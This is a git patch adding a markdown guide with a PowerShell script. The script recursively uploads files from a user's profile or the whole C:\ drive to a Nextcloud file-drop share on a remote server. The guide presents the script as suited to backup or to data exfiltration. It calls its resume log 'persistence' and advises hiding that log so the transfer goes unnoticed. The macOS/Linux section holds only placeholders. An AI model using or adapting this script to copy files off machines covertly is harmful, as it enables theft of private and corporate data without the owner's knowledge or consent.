From 70cd97d70666cfb67e274c14ab54d633390107c1 Mon Sep 17 00:00:00 2001 From: Nicole Rappe Date: Tue, 16 Jul 2024 22:41:59 -0600 Subject: [PATCH] Add Scripts/Powershell/Upload Data to Nextcloud.md --- .../Powershell/Upload Data to Nextcloud.md | 110 ++++++++++++++++++ 1 file changed, 110 insertions(+) create mode 100644 Scripts/Powershell/Upload Data to Nextcloud.md diff --git a/Scripts/Powershell/Upload Data to Nextcloud.md b/Scripts/Powershell/Upload Data to Nextcloud.md new file mode 100644 index 0000000..e5b7a9e --- /dev/null +++ b/Scripts/Powershell/Upload Data to Nextcloud.md @@ -0,0 +1,110 @@ +**Purpose**: In some unique cases, you want to be able to either perform backups of data or exfiltrate data to Nextcloud from a local device via the use of a script. Doing such a thing with Nextcloud as the destination is not very documented, but you can achieve that result by running a script like what is seen below: + +=== "Windows" + + ``` powershell + # -------------------------- + # Variables to Pass to the Script at Execution + # -------------------------- + # NEXTCLOUD_SERVER_URL # (1) + # NEXTCLOUD_SHARE_PASSWORD # (2) + # NEXTCLOUD_SHARE # (3) + # IGNORE_LIST # (4) + # PRIMARY_DIR # (5) + # SECONDARY_DIR # (6) + # $LOGFILE = "C:\Windows\Temp\nc_pull.log" # (7) + + # -------------------------- + # Function for File Upload Logic + # -------------------------- + Function Upload-Files ($targetDir) { + Get-ChildItem -Path $targetDir -Recurse -File -Force -ErrorAction SilentlyContinue | ForEach-Object { + try { + # -------------------------- + # Check Ignore List + # -------------------------- + $ignore = $false # Initialize variable to check if current folder should be ignored + foreach ($item in $IGNORE_LIST) { + if ($_.Directory -match [regex]::Escape($item)) { + $ignore = $true + break + } + } + if ($ignore) { + Write-Host "Ignoring file $($_.FullName) due to directory match in ignore list." + return + } + + # -------------------------- + # Upload File Process + # -------------------------- + $filename = $_.Name # Extract just the filename + + # Check if this file has been uploaded before by searching in the log file + if ((Get-Content $LOGFILE) -notcontains $_.FullName) { + + Write-Host "Uploading $($_.FullName) ..." + + # Upload the file + $response = Invoke-RestMethod -Uri ($URL + $filename) -Method Put -InFile $_.FullName -Headers @{'X-Requested-With' = 'XMLHttpRequest'} -Credential $credentials + + # Record this file in the log since it was successfully uploaded + Add-Content -Path $LOGFILE -Value $_.FullName + + } else { + Write-Host "Skipping previously uploaded file $($_.FullName)" + } + } catch { + Write-Host "Error encountered while processing $($_.FullName): $_.Exception.Message" + } + } + } + + # -------------------------- + # Initialize Environment Variables + # -------------------------- + $securePassword = ConvertTo-SecureString $env:NEXTCLOUD_SHARE_PASSWORD -AsPlainText -Force + $credentials = New-Object System.Management.Automation.PSCredential ($env:NEXTCLOUD_SHARE, $securePassword) + $PRIMARY_DIR = $env:PRIMARY_DIR + $SECONDARY_DIR = $env:SECONDARY_DIR + $URL = "$env:NEXTCLOUD_SERVER_URL/public.php/webdav/" + $IGNORE_LIST = $env:IGNORE_LIST -split ';' # Splitting the folder names into an array + + # -------------------------- + # Checking Log File + # -------------------------- + if (-not (Test-Path $LOGFILE)) { + New-Item -Path $LOGFILE -ItemType "file" + } + + # -------------------------- + # Perform Uploads + # -------------------------- + Write-Host "Uploading files from primary directory: $PRIMARY_DIR" + Upload-Files $PRIMARY_DIR + + Write-Host "Uploading files from secondary directory: $SECONDARY_DIR" + Upload-Files $SECONDARY_DIR + + ``` + + 1. This is the base URL of the Nextcloud server that data will be copied to. For example `https://cloud.bunny-lab.io` + 2. You need to create a share on Nextcloud, and configure it as a `File Drop`, then put a password to protect it. Put that password here. + 3. The tail-end of a nextcloud share link, e.g. `https://cloud.bunny-lab.io/s/<>` + 4. This is a list of files/folders to ignore when iterating through directories. A sensible default is selected if you choose to copy everything from the root C:\ directory. Example Value: + ``` + AppData;AMD;Drivers;Radeon;Program Files;Program Files (x86);Windows;$SysReset;$WinREAgent;PerfLogs;ProgramData;Recovery;System Volume Information;hiberfile.sys;pagefile.sys;swapfile.sys + ``` + 5. This directory target is the primary focus of the upload / backup / exfiltration. The script will iterate through this target first before it moves onto the secondary target. The target can be a directory or a single file. This will act as the main priority of the transfer. e.g. (`C:\Users\Example`) + 6. This is the secondary target, it's less important but nice-to-have with the upload / backup / exfiltration once the primary copy is completed. The target can be a directory or a single file. (e.g. `C:\`) + 7. This file is how the script has "persistence". In case the computer is shut down, rebooted, etc, when it comes back online and the script is re-ran against it, it reads this file to pick up where it last was, and attempts to resume from that point. If this transfer is meant to be hidden, put this file somewhere someone is not likely to find it easily. + +=== "MacOS/Linux" + + ``` sh + placeholder # (1) + placeholder # (2) + ``` + + 1. placeholder + 2. placeholder \ No newline at end of file